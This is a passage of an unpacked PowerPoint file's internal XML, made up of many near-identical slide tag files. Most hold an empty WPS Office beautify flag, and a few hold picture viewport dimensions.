  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag378.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag379.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag38.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag380.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag381.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag382.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag383.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag384.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag385.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag386.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag387.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag388.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag389.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag39.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag390.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag391.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag392.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag393.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag394.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag395.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag396.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag397.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag398.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag399.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag40.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag400.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag401.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag402.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag403.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag404.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag405.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag406.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag407.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag408.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag409.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag41.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag410.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag411.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag412.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag413.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag414.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag415.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag416.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag417.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag418.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag419.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag42.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag420.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag421.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag422.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag423.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag424.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag425.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag426.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag427.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag428.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag429.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag43.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag430.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag431.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag432.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag433.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag434.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag435.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag436.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag437.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag438.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag439.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag44.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag440.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag441.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag442.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag443.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag444.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag445.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag446.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag447.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag448.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag449.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag45.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag450.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag451.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag452.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag453.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag454.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag455.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag456.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag457.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag458.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag459.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag46.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag460.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag461.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag462.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag463.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag464.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag465.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag466.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag467.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag468.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:3435,&quot;width&quot;:9075}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag469.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:10800,&quot;width&quot;:19200}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag47.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag470.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:7074,&quot;width&quot;:7027}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag471.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:930,&quot;width&quot;:4635}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag472.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag473.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag474.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag475.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag476.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag477.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag478.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag479.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag48.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag480.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
